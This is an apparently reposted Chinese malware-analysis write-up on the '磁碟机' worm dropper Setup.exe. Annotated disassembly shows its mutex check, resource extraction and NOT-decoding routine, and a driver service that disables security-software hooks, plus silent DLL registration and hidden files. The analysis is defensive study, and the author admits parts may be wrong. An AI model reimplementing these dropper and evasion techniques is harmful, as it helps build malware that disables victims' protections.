文件: Setup.exe
大小: 159744 字节
修改时间: 2008年2月25日, 02:46:28
MD5: E4284D269C5FE7C4F3D1EF9D24AE2077
SHA1: F315C0DE3C095126ED1693F1EC6689F227FFA4E2
CRC32: 80A32F35
加壳:UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
编写语言:Microsoft Visual C++ 6.0
写在前面:
花了几天时间,参考了几个高手的分析,才有了这个残篇,在这里表示感谢轩辕小聪(答阳光,关于pagefile_pif对付安全软件行为的实现举例),loveboom(熊猫烧香病毒分析及解决方案),孤独更可靠(磁碟机变种简单分析(lsass.exe、smss.exe、dnsq.dll、NetApi000.sys),清新阳光(新年伊始警惕“磁碟机”新变种(LSASS.exe,SMSS.exe,netcfg.dll,pagefile.pif)(征集更好的查杀方法)
/zuixinbingdu/2008/0213/2475.html
学习过程中还有很多很多东西还是不明不白了,估计有很多地方跟出来可能还是错的,只有慢慢来了,虽然这只是残篇,权作自我激励吧,以下就是本篇的主要内容
1.CreateMutexA创建一个互斥变量,判断病毒是否已经存在内存中
您的位置: .text:004057FC 68 E0 C7 40 00 push offset s_Cnjbla ; "CNJBla"
.text:00405801 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405804 C6 45 FC 3A mov byte ptr [ebp+var_4], 3Ah
.text:00405808 E8 C3 20 00 00 call CString::operator=(char const *)
.text:00405808
.text:0040580D 68 D8 C7 40 00 push offset s_Ipboff ; "ipbofF"
.text:00405812 8D 4D 90 lea ecx, [ebp+var_70]
.text:00405815 E8 CE 20 00 00 call CString::operator+=(char const *)
.text:00405815
.text:0040581A FF 75 90 push [ebp+var_70] ; lpName
.text:0040581D 6A 01 push 1 ; bInitialOwner
.text:0040581F 53 push ebx ; lpMutexAttributes
.text:00405820 FF 15 A4 90 40 00 call ds:CreateMutexA ; |pSecurity = NULL
.text:00405820 ; |InitialOwner = TRUE
.text:00405820 ; \MutexName = "CNJBlaipbofF"
.text:004058202.释放文件(有几个跟丢了 ^_^ )
病毒主要是读取自身的资源,然后释放出来害人,以下是资源和文件的对照
\ResourceType = "sexe"
|ResourceName = C4=196号资源
|FileName = "C:\winnt\system32\com\smss.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexa"
|ResourceName = C0=192号资源
|FileName = "C:\winnt\system32\com\netcfg.000"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
resouse=sexh
|FileName = "C:\winnt\system32\com\lsass.exe"
\ResourceType = "sexs"
|ResourceName = C2=194号资源
|FileName = "C:\NetApi000.sys"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexp"
|ResourceName = C1=193号资源
|FileName = "c:\pagefile.exe"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL
\ResourceType = "sexh"
|ResourceName = C3=195号资源
|FileName = "C:\winnt\system32\dnsq.dll"
|Access = GENERIC_WRITE
|ShareMode = 0
|pSecurity = NULL
|Mode = CREATE_ALWAYS
|Attributes = 0
\hTemplateFile = NULL具体实现的反汇编代码,FindResourceA获取资源,SizeofResource 计算资源的大小,LoadResource 来装载获取的资源,WriteFile写入吧 ^_^
..text:00403B42 68 C4 C6 40 00 push offset s_Sexe ; "sexe"
.text:00403B47 E8 CC 3D 00 00 call CString::CString(char const *)
.text:00403B47
.text:00403B4C 68 C4 00 00 00 push 0C4h ; hObject
.text:00403B51 51 push ecx ; lpFileName
.text:00403B52 8D 45 08 lea eax, [ebp+lpFileName]
.text:00403B55 8B CC mov ecx, esp
.text:00403B57 89 65 EC mov [ebp+var_14], esp
.text:00403B5A 50 push eax
.text:00403B5B C6 45 FC 01 mov byte ptr [ebp+var_4], 1
.text:00403B5F E8 72 3D 00 00 call CString::CString(CString const &)
.text:00403B5F
.text:00403B64 80 65 FC 00 and byte ptr [ebp+var_4], 0
.text:00403B68 8B CE mov ecx, esi
.text:00403B6A E8 99 F7 FF FF call process_resources
.text:00403308 process_resources proc near ; CODE XREF: sub_403B09+61p
.text:00403308 ; sub_403DF4+7B3p
.text:00403308 ; sub_403DF4+10DDp
.text:00403308 ; sub_403DF4+18A4p
.text:00403308 ; sub_403DF4+1DABp
.text:00403308
.text:00403308 NumberOfBytesWritten= dword ptr -14h
.text:00403308 hResData= dword ptr -10h
.text:00403308 var_C= dword ptr -0Ch
.text:00403308 var_4= dword ptr -4
.text:00403308 lpFileName= dword ptr 8
.text:00403308 hObject= dword ptr 0Ch
.text:00403308 lpType= dword ptr 10h
.text:00403308
.text:00403308 B8 84 81 40 00 mov eax, offset __ehhandler$?CreateNewChild@CMDIFrameWnd@@QAEPAVCMDIChildWnd@@PAUCRuntimeClass@@IPAUHMENU__@@PAUHACCEL__@@@Z
.text:0040330D E8 AE 46 00 00 call _EH_prolog
.text:0040330D
.text:00403312 51 push ecx
.text:00403313 51 push ecx
.text:00403314 53 push ebx
.text:00403315 56 push esi
.text:00403316 57 push edi
.text:00403317 33 FF xor edi, edi
.text:00403319 89 7D FC mov [ebp+var_4], edi
.text:0040331C 0F B7 45 0C movzx eax, word ptr [ebp+hObject]
.text:00403320 FF 75 10 push [ebp+lpType] ; lpType
.text:00403323 50 push eax ; lpName
.text:00403324 57 push edi ; hModule
.text:00403325 FF 15 64 90 40 00 call ds:FindResourceA ; |hModule = NULL
.text:00403325 ; |ResourceName = C4
.text:00403325 ; \ResourceType = "sexe"
.text:00403325 ;
.text:00403325
.text:0040332B 8B D8 mov ebx, eax
.text:0040332D 3B DF cmp ebx, edi
.text:0040332F 0F 84 CA 00 00 00 jz loc_4033FF
.text:0040332F
.text:00403335 53 push ebx ; hResInfo
.text:00403336 57 push edi ; hModule
.text:00403337 FF 15 70 90 40 00 call ds:SizeofResource ; |hModule = NULL
.text:00403337 ; \hResource = 0040F0C8
.text:00403337 ;
.text:00403337
.text:0040333D 53 push ebx ; hResInfo
.text:0040333E 57 push edi ; hModule
.text:0040333F 8B F0 mov esi, eax
.text:00403341 FF 15 68 90 40 00 call ds:LoadResource ; |hModule = NULL
.text:00403341 ; \hResource = 0040F188
.text:00403341
.text:00403347 3B C7 cmp eax, edi ; edi=00000000
.text:00403347 ; eax=00415890 (Setup.00415890)
.text:00403347 ;
.text:00403349 89 45 F0 mov [ebp+hResData], eax
.text:0040334C 0F 84 AD 00 00 00 jz loc_4033FF
.text:0040334C
.text:00403352 57 push edi ; hTemplateFile
.text:00403353 57 push edi ; dwFlagsAndAttributes
.text:00403354 6A 02 push 2 ; dwCreationDisposition
.text:00403356 57 push edi ; lpSecurityAttributes
.text:00403357 57 push edi ; dwShareMode
.text:00403358 68 00 00 00 40 push 40000000h ; dwDesiredAccess
.text:0040335D FF 75 08 push [ebp+lpFileName] ; lpFileName
.text:00403360 FF 15 E0 90 40 00 call ds:CreateFileA ; |FileName = "C:\winnt\system32\com\smss.exe"
.text:00403360 ; |Access = GENERIC_WRITE
.text:00403360 ; |ShareMode = 0
.text:00403360 ; |pSecurity = NULL
.text:00403360 ; |Mode = CREATE_ALWAYS
.text:00403360 ; |Attributes = 0
.text:00403360 ; \hTemplateFile = NULL
.text:00403360
.text:00403366 3B C7 cmp eax, edi ; edi=00000000
.text:00403366 ; eax=000001AC
.text:00403366 ;
.text:00403368 89 45 0C mov [ebp+hObject], eax
.text:0040336B 0F 84 8E 00 00 00 jz loc_4033FF
.text:0040336B
.text:00403371 8B 1D 70 93 40 00 mov ebx, ds:malloc
.text:00403377 56 push esi ; Size=1001 (4097.)
.text:00403378 FF D3 call ebx ; malloc
.text:00403378
.text:0040337A 56 push esi ; Size
.text:0040337B 8B F8 mov edi, eax
.text:0040337D FF D3 call ebx ; malloc
.text:0040337D
.text:0040337F 59 pop ecx
.text:00403380 8B D8 mov ebx, eax
.text:00403382 85 FF test edi, edi
.text:00403384 59 pop ecx
.text:00403385 74 76 jz short loc_4033FD
.text:00403385
.text:00403387 85 DB test ebx, ebx
.text:00403389 74 72 jz short loc_4033FD
.text:00403389
.text:0040338B 56 push esi ; Size= 1001 (4097.)
.text:0040338C FF 75 F0 push [ebp+hResData] ; hResData=Handles = 415890 (4282512.)
.text:0040338F FF 15 6C 90 40 00 call ds:LockResource
.text:0040338F
.text:00403395 50 push eax ; Src=Setup.00415890
.text:00403396 53 push ebx ; Dst=00348060
.text:00403397 E8 3C 46 00 00 call memcpy ; |dest = 00348060
.text:00403397 ; |src = Setup.00415890
.text:00403397 ; \n = 1001 (4097.)
.text:00403397 ;
.text:00403397
.text:0040339C 83 C4 0C add esp, 0Ch
.text:0040339F 33 C9 xor ecx, ecx
.text:004033A1 85 F6 test esi, esi
.text:004033A3 76 0F jbe short loc_4033B4
.text:004033A3
.text:004033A5 8D 44 33 FF lea eax, [ebx+esi-1]
.text:004033A5
.text:004033A9
.text:004033A9 loc_4033A9: ; CODE XREF: process_resources+AAj
.text:004033A9 8A 10 mov dl, [eax] ; ds:[00349060]=0D (Carriage Return)
.text:004033A9 ; dl=01
.text:004033A9 ;
.text:004033AB 88 14 39 mov [ecx+edi], dl ; dl=0D (Carriage Return)
.text:004033AB ; ds:[01208470]=0D (Carriage Return)
.text:004033AE 41 inc ecx
.text:004033AF 48 dec eax
.text:004033B0 3B CE cmp ecx, esi
.text:004033B2 72 F5 jb short loc_4033A9
.text:004033B2
.text:004033B4
.text:004033B4 loc_4033B4: ; CODE XREF: process_resources+9Bj
.text:004033B4 33 C0 xor eax, eax
.text:004033B6 80 3F 0D cmp byte ptr [edi], 0Dh
.text:004033B9 75 16 jnz short loc_4033D1
.text:004033B9
.text:004033BB 6A 01 push 1
.text:004033BD 59 pop ecx
.text:004033BE 3B F1 cmp esi, ecx
.text:004033C0 8B C1 mov eax, ecx
.text:004033C2 76 0D jbe short loc_4033D1
.text:004033C2
.text:004033C4
.text:004033C4 loc_4033C4: ; CODE XREF: process_resources+C7j
.text:004033C4 8A 14 39 mov dl, [ecx+edi]
.text:004033C7 F6 D2 not dl
.text:004033C9 88 14 39 mov [ecx+edi], dl
.text:004033CC 41 inc ecx
.text:004033CD 3B CE cmp ecx, esi
.text:004033CF 72 F3 jb short loc_4033C4
.text:004033CF
.text:004033D1
.text:004033D1 loc_4033D1: ; CODE XREF: process_resources+B1j
.text:004033D1 ; process_resources+BAj
.text:004033D1 8D 4D EC lea ecx, [ebp+NumberOfBytesWritten]
.text:004033D4 6A 00 push 0 ; lpOverlapped=NULL
.text:004033D6 2B F0 sub esi, eax ; eax=00000001
.text:004033D6 ; esi=00001001
.text:004033D8 51 push ecx ; lpNumberOfBytesWritten=ecx=0012E098
.text:004033D8 ;
.text:004033D9 03 C7 add eax, edi ; edi=01208470
.text:004033D9 ; eax=00000001
.text:004033DB 56 push esi ; nNumberOfBytesToWrite=esi=00001000
.text:004033DC 50 push eax ; lpBuffer=eax=01208471
.text:004033DD FF 75 0C push [ebp+hObject] ; hFile=堆栈 ss:[0012E0B8]=000001AC
.text:004033E0 FF 15 90 90 40 00 call ds:WriteFile ; |hFile = 000001AC
.text:004033E0 ; |Buffer = 01208471
.text:004033E0 ; |nBytesToWrite = 1000 (4096.)
.text:004033E0 ; |pBytesWritten = 0012E098
.text:004033E0
.text:004033E6 57 push edi ; Memory
.text:004033E7 8B F0 mov esi, eax
.text:004033E9 FF 15 78 93 40 00 call ds:free
.text:004033E9
.text:004033EF 59 pop ecx
.text:004033F0 FF 75 0C push [ebp+hObject] ; hObject=堆栈 ss:[0012E0B8]=000001AC
.text:004033F3 FF 15 60 90 40 00 call ds:CloseHandle
2.2 NetApi000.sys通过OpenSCManagerA,CreateServiceA ,StartServiceA几个服务相关的api来启动自己还原安全软件hook的SSDT。
.
复制内容到剪贴板
代码:
text:00402064 sub_402064 proc near ; CODE XREF: sub_403DF4+10FCp
.text:00402064
.text:00402064 BinaryPathName= byte ptr -104h
.text:00402064
.text:00402064 55 push ebp
.text:00402065 8B EC mov ebp, esp
.text:00402067 81 EC 04 01 00 00 sub esp, 104h
.text:0040206D 56 push esi
.text:0040206E 8D 85 FC FE FF FF lea eax, [ebp+BinaryPathName]
.text:00402074 FF 35 B8 D0 40 00 push Source ; Source="C:\NetApi000.sys")
.text:0040207A 50 push eax ; Dest=eax=0012DFAC
.text:0040207B E8 4C 59 00 00 call strcpy ; |dest = 0012DFAC
.text:0040207B ; \src = "C:\NetApi000.sys"
.text:0040207B
.text:00402080 8D 85 FC FE FF FF lea eax, [ebp+BinaryPathName] ; eax=0012DFAC, (ASCII "C:\NetApi000.sys")
.text:00402086 50 push eax ; lpBinaryPathName
.text:00402087 E8 F2 FE FF FF call sub_401F7E ; eax=0012DFAC, (ASCII "C:\NetApi000.sys")
.text:00402087
.text:0040208C 8B F0 mov esi, eax
.text:0040208E 83 C8 FF or eax, 0FFFFFFFFh
.text:00402091 83 C4 0C add esp, 0Ch
.text:00402094 3B F0 cmp esi, eax ; eax=FFFFFFFF esi=FFFFFFFF
.text:00402096 74 10 jz short loc_4020A8
.text:00402096
.text:00402098 56 push esi ; hDevice
text:00401F7E sub_401F7E proc near ; CODE XREF: sub_402064+23p
.text:00401F7E
.text:00401F7E lpBinaryPathName= dword ptr 4
.text:00401F7E
.text:00401F7E 55 push ebp
.text:00401F7F 56 push esi
.text:00401F80 57 push edi
.text:00401F81 33 F6 xor esi, esi
.text:00401F83 6A 02 push 2 ; dwDesiredAccess
.text:00401F85 56 push esi ; lpDatabaseName
.text:00401F86 56 push esi ; lpMachineName
.text:00401F87 83 CF FF or edi, 0FFFFFFFFh
.text:00401F8A FF 15 2C 90 40 00 call ds:OpenSCManagerA
.text:00401F8A
.text:00401F90 8B E8 mov ebp, eax
.text:00401F92 3B EE cmp ebp, esi
.text:00401F94 74 68 jz short loc_401FFE
.text:00401F94
.text:00401F96 53 push ebx
.text:00401F97 56 push esi ; lpPassword=null
.text:00401F98 56 push esi ; lpServiceStartName=NULL
.text:00401F99 56 push esi ; lpDependencies=NULL
.text:00401F9A 56 push esi ; lpdwTagId=NULL
.text:00401F9B 56 push esi ; lpLoadOrderGroup=NULL
.text:00401F9C FF 74 24 28 push [esp+24h+lpBinaryPathName] ; lpBinaryPathName=ASCII "C:\NetApi000.sys"
.text:00401FA0 BF F8 C3 40 00 mov edi, offset ServiceName ; "NetApi000"
.text:00401FA5 56 push esi ; dwErrorControl
.text:00401FA6 6A 03 push 3 ; dwStartType
.text:00401FA8 6A 01 push 1 ; dwServiceType
.text:00401FAA 6A 10 push 10h ; dwDesiredAccess
.text:00401FAC 57 push edi ; lpDisplayName
.text:00401FAD 57 push edi ; lpServiceName
.text:00401FAE 55 push ebp ; hSCManager=ebp=00152660
.text:00401FAF FF 15 28 90 40 00 call ds:CreateServiceA ; 参数:
.text:00401FAF ; |hManager = 00152660
.text:00401FAF ; |ServiceName = "NetApi000"
.text:00401FAF ; |DisplayName = "NetApi000"
.text:00401FAF ; |DesiredAccess = SERVICE_START
.text:00401FAF ; |ServiceType = SERVICE_KERNEL_DRIVER
.text:00401FAF ; |StartType = SERVICE_DEMAND_START
.text:00401FAF ; |ErrorControl = SERVICE_ERROR_IGNORE
.text:00401FAF ; |BinaryPathName = "C:\NetApi000.sys"
.text:00401FAF ; |LoadOrderGroup = NULL
.text:00401FAF ; |pTagId = NULL
.text:00401FAF ; |pDependencies = NULL
.text:00401FAF ; |ServiceStartName = NULL
.text:00401FAF ; \Password = NULL
.text:00401FAF
.text:00401FB5 8B D8 mov ebx, eax
.text:00401FB7 FF 15 44 90 40 00 call ds:GetLastError
.text:00401FB7
.text:00401FBD 3D 31 04 00 00 cmp eax, 431h
.text:00401FC2 75 0C jnz short loc_401FD0
.text:00401FC2
.text:00401FC4 6A 10 push 10h ; dwDesiredAccess
.text:00401FC6 57 push edi ; lpServiceName
.text:00401FC7 55 push ebp ; hSCManager
.text:00401FC8 FF 15 24 90 40 00 call ds:OpenServiceA
.text:00401FC8
.text:00401FCE 8B D8 mov ebx, eax
.text:00401FCE
.text:00401FD0
.text:00401FD0 loc_401FD0: ; CODE XREF: sub_401F7E+44j
.text:00401FD0 56 push esi ; lpServiceArgVectors
.text:00401FD1 56 push esi ; dwNumServiceArgs
.text:00401FD2 53 push ebx ; hService
.text:00401FD3 FF 15 20 90 40 00 call ds:StartServiceA
.text:00401FD3
.text:00401FD9 56 push esi ; hTemplateFile
.text:00401FDA 56 push esi ; dwFlagsAndAttributes
.text:00401FDB 6A 03 push 3 ; dwCreationDisposition
.text:00401FDD 56 push esi ; lpSecurityAttributes
.text:00401FDE 56 push esi ; dwShareMode
.text:00401FDF 68 00 00 00 C0 push 0C0000000h ; dwDesiredAccess
.text:00401FE4 68 E4 C3 40 00 push offset FileName ; "\\\\.\\NetApi000DOS"
.text:00401FE9 FF 15 E0 90 40 00 call ds:CreateFileA ; 参数:
.text:00401FE9 ; |FileName = "\\.\NetApi000DOS"
.text:00401FE9 ; |Access = GENERIC_READ|GENERIC_WRITE
.text:00401FE9 ; |ShareMode = 0
.text:00401FE9 ; |pSecurity = NULL
.text:00401FE9 ; |Mode = OPEN_EXISTING
.text:00401FE9 ; |Attributes = 0
.text:00401FE9 ; \hTemplateFile = NULL
.text:00401FE9
.text:00401FEF 8B 35 1C 90 40 00 mov esi, ds:CloseServiceHandle
.text:00401FF5 53 push ebx ; hSCObject
.text:00401FF6 8B F8 mov edi, eax
.text:00401FF8 FF D6 call esi ; CloseServiceHandle
.text:00401FF8
.text:00401FFA 55 push ebp ; hSCObject
.text:00401FFB FF D6 call esi ; CloseServiceHandle
.text:00401FFB
.text:00401FFD 5B pop ebx
.text:00401FFD
.text:00401FFE
.text:00401FFE loc_401FFE: ; CODE XREF: sub_401F7E+16j
.text:00401FFE 8B C7 mov eax, edi
.text:00402000 5F pop edi
.text:00402001 5E pop esi
.text:00402002 5D pop ebp
.text:00402003 C3 retn
.text:00402003
.text:00402003 sub_401F7E endp
.
复制内容到剪贴板
代码:
text:004056C4 53 push ebx ; bFailIfExists
.text:004056C5 FF 75 E8 push [ebp+var_18] ; lpNewFileName
.text:004056C8 50 push eax ; lpExistingFileName
.text:004056C9 FF 15 00 91 40 00 call ds:CopyFileA ; |ExistingFileName = "C:\winnt\system32\com\netcfg.000"
.text:004056C9 ; |NewFileName = "C:\winnt\system32\com\netcfg.dll"
.text:004056C9 ; \FailIfExists = FALSE
.
复制内容到剪贴板
代码:
text:00405747 68 F8 C7 40 00 push offset s_Cfg_dllS ; "cfg.dll /s"
.text:0040574C 50 push eax
.text:0040574D 8D 45 E8 lea eax, [ebp+var_18]
.text:00405750 C6 45 FC 39 mov byte ptr [ebp+var_4], 39h
.text:00405754 50 push eax
.text:00405755 E8 A6 21 00 00 call operator+(CString const &,char const *)
.text:00405755
.text:0040575A 8B 00 mov eax, [eax]
.text:0040575C 53 push ebx ; nShowCmd
.text:0040575D 53 push ebx ; lpDirectory
.text:0040575E 50 push eax ; lpParameters
.text:0040575F 68 E8 C7 40 00 push offset s_Regsvr32_exe ; "regsvr32.exe"
.text:00405764 53 push ebx ; lpOperation
.text:00405765 53 push ebx ; hwnd
.text:00405766 FF 15 AC 93 40 00 call ds:ShellExecuteA ; |hWnd = NULL
.text:00405766 ; |Operation = NULL
.text:00405766 ; |FileName = "regsvr32.exe"
.text:00405766 ; |Parameters = "C:\winnt\system32\com\netcfg.dll /s"
.text:00405766 ; |DefDir = NULL
.text:00405766 ; \IsShown = 0
2.2.3设置文件属性为(系统|隐藏)
.
复制内容到剪贴板
代码:
text:0040578E 8B 00 mov eax, [eax]
.text:00405790 6A 06 push 6 ; dwFileAttributes
.text:00405792 50 push eax ; lpFileName
.text:00405793 FF 15 EC 90 40 00 call ds:SetFileAttributesA ; |FileName = "C:\winnt\system32\com\netcfg.000"
.text:00405793 ; \FileAttributes = HIDDEN|SYSTEM
.text:00405793
.text:00405799 8D 4D E8 lea ecx, [ebp+var_18]
.text:0040579C E8 21 20 00 00 call CString::~CString(void)
.text:0040579C
.text:004057A1 8D 45 B8 lea eax, [ebp+var_48]
.text:004057A4 50 push eax
.text:004057A5 8D 45 E8 lea eax, [ebp+var_18]
.text:004057A8 57 push edi
.text:004057A9 50 push eax
.text:004057AA E8 4B 21 00 00 call operator+(CString const &,CString const &)
.text:004057AA
.text:004057AF 8B 00 mov eax, [eax]
.text:004057B1 6A 06 push 6 ; dwFileAttributes
.text:004057B3 50 push eax ; lpFileName
.text:004057B4 FF 15 EC 90 40 00 call ds:SetFileAttributesA ; |FileName = "C:\winnt\system32\com\netcfg.dll"
.text:004057B4 ; \FileAttributes = HIDDEN|SYSTEM
Tags:Setup.exe
来源:爱毒霸
您的评论
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为